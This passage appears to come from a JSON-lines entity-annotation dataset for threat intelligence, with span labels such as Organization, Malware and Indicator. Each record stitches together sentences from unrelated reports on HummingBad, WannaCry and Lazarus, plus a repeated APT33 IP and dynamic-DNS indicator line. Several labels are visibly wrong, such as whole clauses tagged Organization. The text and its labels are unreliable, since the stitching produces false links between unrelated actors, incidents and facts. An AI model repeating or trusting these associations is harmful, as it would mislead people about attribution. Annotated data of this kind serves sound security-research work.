The ads are very similar to other brand impersonation campaigns .", "spans": [{"start": 17, "end": 24, "label": "Organization"}, {"start": 165, "end": 180, "label": "Organization"}, {"start": 192, "end": 195, "label": "Organization"}, {"start": 200, "end": 203, "label": "Organization"}, {"start": 215, "end": 229, "label": "System"}, {"start": 295, "end": 303, "label": "System"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 314, "end": 328, "label": "Indicator"}, {"start": 329, "end": 347, "label": "Indicator"}, {"start": 384, "end": 413, "label": "Organization"}]} {"text": "For the past five months , Check Point researchers have quietly observed the China-based advertising company behind HummingBad in several ways , including by infiltrating the command and control servers it uses . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . APT33 : 8.26.21.119 [REDACTED].ddns.net . 
Its demands for ransom have exceeded 145 million , with collections exceeding 60 million .", "spans": [{"start": 27, "end": 38, "label": "Organization"}, {"start": 116, "end": 126, "label": "Malware"}, {"start": 248, "end": 256, "label": "Malware"}, {"start": 261, "end": 276, "label": "Malware"}, {"start": 279, "end": 292, "label": "Malware"}, {"start": 297, "end": 318, "label": "Malware"}, {"start": 321, "end": 325, "label": "System"}, {"start": 330, "end": 360, "label": "Malware"}, {"start": 379, "end": 410, "label": "Malware"}, {"start": 417, "end": 446, "label": "Malware"}, {"start": 479, "end": 484, "label": "Organization"}, {"start": 487, "end": 498, "label": "Indicator"}, {"start": 499, "end": 518, "label": "Indicator"}]} {"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America . APT33 : 8.26.21.117 srvhost.servehttp.com . \" Indicators of attack IoAs refer to the series of behaviors that a cybercriminal exhibits prior to executing a cyberattack .", "spans": [{"start": 163, "end": 182, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 218, "end": 241, "label": "Organization"}, {"start": 270, "end": 275, "label": "Organization"}, {"start": 278, "end": 289, "label": "Indicator"}, {"start": 290, "end": 311, "label": "Indicator"}, {"start": 316, "end": 336, "label": "Indicator"}, {"start": 337, "end": 341, "label": "Indicator"}, {"start": 355, "end": 437, "label": "Indicator"}]} {"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store . 
We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America . APT33 : 37.48.105.178 servhost.hopto.org . Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 177, "end": 194, "label": "System"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 288, "end": 299, "label": "Organization"}, {"start": 303, "end": 322, "label": "System"}, {"start": 350, "end": 372, "label": "Organization"}, {"start": 396, "end": 401, "label": "Organization"}, {"start": 404, "end": 417, "label": "Indicator"}, {"start": 418, "end": 436, "label": "Indicator"}, {"start": 454, "end": 518, "label": "Organization"}, {"start": 529, "end": 598, "label": "Organization"}]} {"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component . APT33 : 8.26.21.117 srvhost.servehttp.com . The login , as mentioned above , was also designed to look legitimate .", "spans": [{"start": 348, "end": 353, "label": "Organization"}, {"start": 356, "end": 367, "label": "Indicator"}, {"start": 368, "end": 389, "label": "Indicator"}]} {"text": "\" Emboldened by financial and technological independence , their skillsets will advance\u2013putting end users , enterprises , and government agencies at risk . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . APT33 : 5.187.21.70 microsoftupdated.com . 
This seeming \u201c streamlining \u201d of activities by DPRK often makes it difficult for defenders to track , attribute , and thwart malicious activities , while enabling this now collaborative adversary to move stealthily and with greater speed .", "spans": [{"start": 171, "end": 178, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 251, "end": 262, "label": "Indicator"}, {"start": 263, "end": 283, "label": "Indicator"}]} {"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization . APT33 : 64.251.19.214 mynetwork.ddns.net . To perform analysis of NetScaler memory core dump files , they need to be collected .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 140, "end": 150, "label": "Malware"}, {"start": 151, "end": 154, "label": "System"}, {"start": 199, "end": 212, "label": "Organization"}, {"start": 373, "end": 378, "label": "Organization"}, {"start": 381, "end": 394, "label": "Indicator"}, {"start": 395, "end": 413, "label": "Indicator"}, {"start": 439, "end": 471, "label": "System"}]} {"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . APT33 : 64.251.19.217 [REDACTED].servehttp.com . 
Cuba ransomware was first observed in 2019 .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 232, "end": 243, "label": "Organization"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 340, "end": 353, "label": "Indicator"}, {"start": 354, "end": 378, "label": "Indicator"}, {"start": 381, "end": 396, "label": "Malware"}]} {"text": "Check Point analyzed Yingmob \u2019 s Umeng account to gain further insights into the HummingBad campaign and found that beyond the 10 million devices under the control of malicious apps , Yingmob has non-malicious apps installed on another 75 million or so devices . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . APT33 : 64.251.19.214 [REDACTED].ddns.net . 
The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 21, "end": 28, "label": "Organization"}, {"start": 81, "end": 91, "label": "Malware"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 263, "end": 274, "label": "Organization"}, {"start": 302, "end": 338, "label": "Organization"}, {"start": 343, "end": 372, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}, {"start": 438, "end": 453, "label": "Malware"}, {"start": 524, "end": 529, "label": "Organization"}, {"start": 532, "end": 545, "label": "Indicator"}, {"start": 546, "end": 565, "label": "Indicator"}, {"start": 572, "end": 599, "label": "Organization"}, {"start": 665, "end": 694, "label": "Organization"}]} {"text": "The researchers wrote : While profit is powerful motivation for any attacker , Yingmob \u2019 s apparent self-sufficiency and organizational structure make it well-positioned to expand into new business ventures , including productizing the access to the 85 million Android devices it controls . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation . APT33 : 64.251.19.214 mynetwork.ddns.net . Another example would be that of a person selling illicit products on the dark web .", "spans": [{"start": 79, "end": 86, "label": "Organization"}, {"start": 261, "end": 268, "label": "System"}, {"start": 291, "end": 294, "label": "Organization"}, {"start": 320, "end": 339, "label": "Organization"}, {"start": 481, "end": 486, "label": "Organization"}, {"start": 489, "end": 502, "label": "Indicator"}, {"start": 503, "end": 521, "label": "Indicator"}]} {"text": "This alone would attract a whole new audience\u2013and a new stream of revenue\u2013for Yingmob . 
Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . APT33 : 64.251.19.214 [REDACTED].sytes.net . The Stuxnet Virus identified in 2010 that was used to destroy the Iranian centrifuges is but one relevant example of such a motivation .", "spans": [{"start": 78, "end": 85, "label": "Organization"}, {"start": 130, "end": 138, "label": "System"}, {"start": 145, "end": 149, "label": "System"}, {"start": 157, "end": 168, "label": "System"}, {"start": 346, "end": 364, "label": "Organization"}, {"start": 367, "end": 375, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}, {"start": 398, "end": 410, "label": "Organization"}, {"start": 415, "end": 437, "label": "Organization"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 463, "end": 476, "label": "Indicator"}, {"start": 477, "end": 497, "label": "Indicator"}, {"start": 500, "end": 517, "label": "Malware"}, {"start": 566, "end": 585, "label": "Organization"}]} {"text": "Quick , easy access to sensitive data on mobile devices connected to enterprises and government agencies around the globe is extremely attractive to cybercriminals and hacktivists . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . APT33 : 64.251.19.217 [REDACTED].myftp.org . 
STRATOFEAR also contains strings that are used to report a module \u2019s location .", "spans": [{"start": 224, "end": 232, "label": "System"}, {"start": 239, "end": 243, "label": "System"}, {"start": 251, "end": 262, "label": "System"}, {"start": 440, "end": 458, "label": "Organization"}, {"start": 461, "end": 469, "label": "Organization"}, {"start": 472, "end": 489, "label": "Organization"}, {"start": 492, "end": 504, "label": "Organization"}, {"start": 509, "end": 531, "label": "Organization"}, {"start": 549, "end": 554, "label": "Organization"}, {"start": 557, "end": 570, "label": "Indicator"}, {"start": 571, "end": 591, "label": "Indicator"}, {"start": 594, "end": 604, "label": "Malware"}, {"start": 610, "end": 671, "label": "Malware"}]} {"text": "Drive-by downloads and multiple rooting exploits The malware uses a variety of methods to infect devices . We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia . APT33 : 64.251.19.216 srvhost.servehttp.com . The next step is to collect some information about the victim system to send them to the C2 server .", "spans": [{"start": 216, "end": 227, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 264, "end": 277, "label": "Indicator"}, {"start": 278, "end": 299, "label": "Indicator"}, {"start": 322, "end": 386, "label": "Malware"}, {"start": 391, "end": 400, "label": "System"}]} {"text": "One involves drive-by downloads , possibly on booby-trapped porn sites . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . APT33 : 64.251.19.217 [REDACTED].myftp.org . 
The encrypted files contain a marker string 0x666 followed by the data appended by the ransomware .", "spans": [{"start": 73, "end": 81, "label": "System"}, {"start": 91, "end": 102, "label": "Vulnerability"}, {"start": 124, "end": 127, "label": "System"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 204, "end": 217, "label": "Indicator"}, {"start": 218, "end": 238, "label": "Indicator"}, {"start": 245, "end": 290, "label": "Indicator"}, {"start": 307, "end": 338, "label": "Indicator"}]} {"text": "The attacks use multiple exploits in an attempt to gain root access on a device . Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . APT33 : 64.251.19.217 [REDACTED].myftp.org . Additionally we observed the DPRK threat actor log directly into a Pyongyang IP , from one of their jump boxes .", "spans": [{"start": 154, "end": 162, "label": "System"}, {"start": 277, "end": 282, "label": "Organization"}, {"start": 285, "end": 298, "label": "Indicator"}, {"start": 299, "end": 319, "label": "Indicator"}, {"start": 351, "end": 368, "label": "Organization"}, {"start": 387, "end": 401, "label": "System"}]} {"text": "When rooting fails , a second component delivers a fake system update notification in hopes of tricking users into granting HummingBad system-level permissions . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 . APT33 : 64.251.19.215 [REDACTED].myftp.org . 
The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": [{"start": 124, "end": 134, "label": "Malware"}, {"start": 162, "end": 170, "label": "System"}, {"start": 187, "end": 191, "label": "System"}, {"start": 195, "end": 206, "label": "System"}, {"start": 253, "end": 263, "label": "System"}, {"start": 365, "end": 374, "label": "Organization"}, {"start": 378, "end": 398, "label": "System"}, {"start": 401, "end": 404, "label": "System"}, {"start": 429, "end": 434, "label": "Organization"}, {"start": 437, "end": 450, "label": "Indicator"}, {"start": 451, "end": 471, "label": "Indicator"}, {"start": 474, "end": 497, "label": "Organization"}, {"start": 534, "end": 544, "label": "Organization"}, {"start": 610, "end": 626, "label": "Malware"}]} {"text": "Whether or not rooting succeeds , HummingBad downloads a large number of apps . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . APT33 : 64.251.19.217 [REDACTED].myftp.org . 
Here are some reasons why : \u2022 No WebSocket being used To complicate things , we observed some stores that had both skimmers at the same time , which is another reason why we believe they are not related : We started calling this new skimmer ' Kritec ' after one of its domain names .", "spans": [{"start": 34, "end": 44, "label": "Malware"}, {"start": 84, "end": 100, "label": "System"}, {"start": 148, "end": 181, "label": "Malware"}, {"start": 207, "end": 218, "label": "Malware"}, {"start": 260, "end": 263, "label": "System"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 300, "end": 313, "label": "Indicator"}, {"start": 314, "end": 334, "label": "Indicator"}, {"start": 370, "end": 379, "label": "System"}, {"start": 431, "end": 437, "label": "Indicator"}, {"start": 452, "end": 460, "label": "Malware"}, {"start": 570, "end": 577, "label": "Malware"}, {"start": 580, "end": 586, "label": "Malware"}]} {"text": "In some cases , malicious components are dynamically downloaded onto a device after an infected app is installed . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . APT33 : 64.251.19.216 [REDACTED].myftp.org . Notably , there were no overlaps in infrastructure between these clusters of activity .", "spans": [{"start": 115, "end": 123, "label": "System"}, {"start": 159, "end": 170, "label": "Vulnerability"}, {"start": 200, "end": 214, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 244, "end": 257, "label": "Indicator"}, {"start": 258, "end": 278, "label": "Indicator"}, {"start": 302, "end": 366, "label": "Indicator"}]} {"text": "From there , infected phones display illegitimate ads and install fraudulent apps after certain events , such as rebooting , the screen turning on or off , a detection that the user is present , or a change in Internet connectivity . 
WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . APT33 : 64.251.19.232 mynetwork.ddns.net . They also list nebiltech[.]shop in their IOCs which is a domain we sometimes saw injected near the Google Tag Manager script , but not within it .", "spans": [{"start": 234, "end": 242, "label": "System"}, {"start": 281, "end": 286, "label": "Malware"}, {"start": 299, "end": 334, "label": "Malware"}, {"start": 404, "end": 409, "label": "Organization"}, {"start": 412, "end": 425, "label": "Indicator"}, {"start": 426, "end": 444, "label": "Indicator"}, {"start": 462, "end": 478, "label": "Indicator"}, {"start": 546, "end": 571, "label": "Malware"}]} {"text": "HummingBad also has the ability to inject code into Google Play to tamper with its ratings and statistics . In May 2017 , SecureWorks\u00ae Counter Threat Unit\u00ae ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world . APT33 : 64.251.19.214 [REDACTED].ddns.net . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 52, "end": 63, "label": "System"}, {"start": 122, "end": 155, "label": "Organization"}, {"start": 158, "end": 161, "label": "Organization"}, {"start": 220, "end": 224, "label": "System"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 358, "end": 371, "label": "Indicator"}, {"start": 372, "end": 391, "label": "Indicator"}, {"start": 544, "end": 569, "label": "Organization"}]} {"text": "It does this by using infected devices to imitate clicks on the install , buy , and accept buttons . 
In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world . APT33 : 162.250.145.204 mynetwork.ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 120, "end": 151, "label": "Organization"}, {"start": 154, "end": 157, "label": "Organization"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 295, "end": 310, "label": "Indicator"}, {"start": 311, "end": 329, "label": "Indicator"}, {"start": 332, "end": 363, "label": "Organization"}, {"start": 409, "end": 460, "label": "Organization"}]} {"text": "Many of the 10 million infected phones are running old versions of Android and reside in China ( 1.6 million ) and India ( 1.35 million ) . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . APT33 : 188.165.4.81 svcexplores.com . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)\u2014including the leak of nearly 10 million drivers ' licenses \u2014 to the University of Rochester and multiple corporations .", "spans": [{"start": 67, "end": 74, "label": "System"}, {"start": 140, "end": 149, "label": "Organization"}, {"start": 164, "end": 185, "label": "Vulnerability"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 242, "end": 254, "label": "Indicator"}, {"start": 255, "end": 270, "label": "Indicator"}, {"start": 277, "end": 283, "label": "System"}, {"start": 478, "end": 501, "label": "Organization"}, {"start": 506, "end": 527, "label": "Organization"}]} {"text": "Still , US-based infected phones total almost 287,000 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . APT33 : 64.251.19.231 mynetwork.ddns.net . 
The goal of UNC1945 is currently unknown because Mandiant has not been able to observe the activities that followed UNC1945 compromises .", "spans": [{"start": 78, "end": 91, "label": "Vulnerability"}, {"start": 135, "end": 149, "label": "Organization"}, {"start": 150, "end": 162, "label": "Organization"}, {"start": 174, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Indicator"}, {"start": 196, "end": 214, "label": "Indicator"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}]} {"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . APT33 : 64.251.19.231 [REDACTED].ddns.net . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 31, "end": 38, "label": "System"}, {"start": 52, "end": 58, "label": "System"}, {"start": 89, "end": 99, "label": "System"}, {"start": 125, "end": 146, "label": "System"}, {"start": 173, "end": 181, "label": "System"}, {"start": 226, "end": 251, "label": "Vulnerability"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 262, "end": 275, "label": "Indicator"}, {"start": 276, "end": 295, "label": "Indicator"}]} {"text": "Lollipop has 7 percent , Ice Cream Sandwich has 2 percent , and Marshmallow has 1 percent . WCry uses a combination of the RSA and AES algorithms to encrypt files . APT33 : 64.251.19.232 [REDACTED].ddns.net . 
In essence , this provides the threat actor unrestricted access to the account .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 25, "end": 43, "label": "System"}, {"start": 64, "end": 75, "label": "System"}, {"start": 92, "end": 96, "label": "System"}, {"start": 123, "end": 126, "label": "System"}, {"start": 131, "end": 134, "label": "System"}, {"start": 149, "end": 162, "label": "Malware"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 173, "end": 186, "label": "Indicator"}, {"start": 187, "end": 206, "label": "Indicator"}]} {"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence . APT33 : 64.251.19.216 [REDACTED].myftp.biz . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n\u2019t happening any time soon .", "spans": [{"start": 82, "end": 88, "label": "Malware"}, {"start": 204, "end": 212, "label": "System"}, {"start": 227, "end": 231, "label": "System"}, {"start": 277, "end": 282, "label": "Organization"}, {"start": 285, "end": 298, "label": "Indicator"}, {"start": 299, "end": 319, "label": "Indicator"}, {"start": 344, "end": 349, "label": "Malware"}, {"start": 354, "end": 363, "label": "Malware"}]} {"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group . APT33 : 91.230.121.143 remote-server.ddns.net . 
The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": [{"start": 129, "end": 136, "label": "Organization"}, {"start": 176, "end": 185, "label": "Organization"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 237, "end": 255, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 393, "end": 397, "label": "Organization"}, {"start": 418, "end": 431, "label": "Organization"}, {"start": 434, "end": 439, "label": "Organization"}, {"start": 442, "end": 456, "label": "Indicator"}, {"start": 457, "end": 479, "label": "Indicator"}]} {"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group . APT33 : 162.250.145.222 [REDACTED].ddns.net . loop all over the string to execute the decoding operation .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 89, "end": 100, "label": "System"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 257, "end": 270, "label": "Organization"}, {"start": 273, "end": 278, "label": "Organization"}, {"start": 281, "end": 296, "label": "Indicator"}, {"start": 297, "end": 316, "label": "Indicator"}]} {"text": "Readers should carefully think through the risks before changing this default setting . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware . APT33 : 64.251.19.216 [REDACTED].redirectme.net . 
Cisco Secure Email ( formerly Cisco Email Security ) can block malicious emails sent by threat actors as part of their campaign .", "spans": [{"start": 106, "end": 119, "label": "Organization"}, {"start": 140, "end": 148, "label": "System"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 183, "end": 196, "label": "Indicator"}, {"start": 197, "end": 222, "label": "Indicator"}, {"start": 225, "end": 243, "label": "System"}, {"start": 255, "end": 275, "label": "System"}]} {"text": "Top 20 countries targeted by Hummingbad/Shedun . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers . APT33 : 8.26.21.222 mynetwork.ddns.net . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": [{"start": 29, "end": 46, "label": "Malware"}, {"start": 67, "end": 80, "label": "Organization"}, {"start": 101, "end": 109, "label": "System"}, {"start": 154, "end": 173, "label": "Organization"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 184, "end": 195, "label": "Indicator"}, {"start": 196, "end": 214, "label": "Indicator"}, {"start": 244, "end": 250, "label": "System"}, {"start": 316, "end": 325, "label": "Malware"}]} {"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus . APT33 : 8.26.21.223 [REDACTED].ddns.net . But on Mar. 
5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": [{"start": 39, "end": 56, "label": "Malware"}, {"start": 71, "end": 82, "label": "Organization"}, {"start": 257, "end": 269, "label": "Organization"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 280, "end": 291, "label": "Indicator"}, {"start": 292, "end": 311, "label": "Indicator"}, {"start": 337, "end": 345, "label": "Organization"}]} {"text": "Check Point Software Hummingbad/Shedun infections by Android version . In November 2017 , Secureworks Counter Threat Unit\u2122 ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company . APT33 : 217.147.168.44 remserver.ddns.net . Establish robust network segmentation between MicroSCADA hosts and IT networks .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 21, "end": 38, "label": "Malware"}, {"start": 53, "end": 60, "label": "System"}, {"start": 90, "end": 122, "label": "Organization"}, {"start": 125, "end": 128, "label": "Organization"}, {"start": 171, "end": 189, "label": "Organization"}, {"start": 201, "end": 214, "label": "Organization"}, {"start": 241, "end": 255, "label": "Organization"}, {"start": 259, "end": 270, "label": "Organization"}, {"start": 390, "end": 412, "label": "Organization"}, {"start": 415, "end": 420, "label": "Organization"}, {"start": 423, "end": 437, "label": "Indicator"}, {"start": 438, "end": 456, "label": "Indicator"}]} {"text": "Enlarge / Hummingbad/Shedun infections by Android version . 
In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company . APT33 : 195.20.52.172 mynetwork.cf . In other instances , such as the Babuk source code , the leaks were seemingly an operational error .", "spans": [{"start": 10, "end": 27, "label": "Malware"}, {"start": 42, "end": 49, "label": "System"}, {"start": 79, "end": 82, "label": "Organization"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 286, "end": 308, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 319, "end": 332, "label": "Indicator"}, {"start": 333, "end": 345, "label": "Indicator"}, {"start": 381, "end": 398, "label": "Malware"}]} {"text": "Check Point Software So far , HummingBad has been observed using its highly privileged status only to engage in click fraud , display pop-up ads , tamper with Google Play , and install additional apps that do more of the same . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . APT33 : 8.26.21.221 mynetwork.ddns.net . 
Further fields of interest in the XPdb had the prefix \u201c responsible _ \u201d and contained information about the parent of the process which violated the behavioral rules .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 30, "end": 40, "label": "Malware"}, {"start": 159, "end": 170, "label": "System"}, {"start": 228, "end": 236, "label": "System"}, {"start": 319, "end": 343, "label": "Organization"}, {"start": 412, "end": 435, "label": "Organization"}, {"start": 438, "end": 443, "label": "Organization"}, {"start": 446, "end": 457, "label": "Indicator"}, {"start": 458, "end": 476, "label": "Indicator"}, {"start": 513, "end": 517, "label": "System"}]} {"text": "But there 's little stopping it from doing much worse . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing . APT33 : 8.26.21.220 [REDACTED].ddns.net . One possibility is that such claims were made disingenuously as an attempt to establish KillNet 's credibility and/or as a means to distance the group from the Russian government .", "spans": [{"start": 56, "end": 59, "label": "Organization"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 197, "end": 208, "label": "Indicator"}, {"start": 209, "end": 228, "label": "Indicator"}, {"start": 387, "end": 411, "label": "Organization"}]} {"text": "That 's because the malware roots most of the phones it infects , a process that subverts key security mechanisms built into Android . CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns . APT33 : 8.26.21.221 [REDACTED].ddns.net . 
While we were unable to identify the SCIL commands executed , we believe they were probably commands to open circuit breakers in the victim \u2019s substation environments .", "spans": [{"start": 125, "end": 132, "label": "System"}, {"start": 135, "end": 138, "label": "Organization"}, {"start": 165, "end": 179, "label": "Organization"}, {"start": 182, "end": 189, "label": "Organization"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 291, "end": 302, "label": "Indicator"}, {"start": 303, "end": 322, "label": "Indicator"}]} {"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign . APT33 : 91.230.121.144 remserver.ddns.net . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 183, "end": 186, "label": "Organization"}, {"start": 236, "end": 250, "label": "Organization"}, {"start": 298, "end": 303, "label": "Organization"}, {"start": 306, "end": 320, "label": "Indicator"}, {"start": 321, "end": 339, "label": "Indicator"}, {"start": 394, "end": 401, "label": "Organization"}]} {"text": "System applications with root , by contrast , have super-user permissions that allow them to break out of such sandboxes . CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 89.34.237.118 mywinnetwork.ddns.net . 
Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the \u201c PIG RANGE \u201d .", "spans": [{"start": 123, "end": 126, "label": "Organization"}, {"start": 173, "end": 191, "label": "System"}, {"start": 236, "end": 250, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 284, "end": 297, "label": "Indicator"}, {"start": 298, "end": 319, "label": "Indicator"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 367, "end": 419, "label": "Indicator"}]} {"text": "From there , root-level apps can read or modify data and resources that would be off-limits to normal apps . CTU researchers also identified components in the custom C2 protocol being used ( the way in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 192.119.15.35 mynetwork.ddns.net . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": [{"start": 109, "end": 112, "label": "Organization"}, {"start": 159, "end": 177, "label": "System"}, {"start": 296, "end": 310, "label": "Organization"}, {"start": 313, "end": 320, "label": 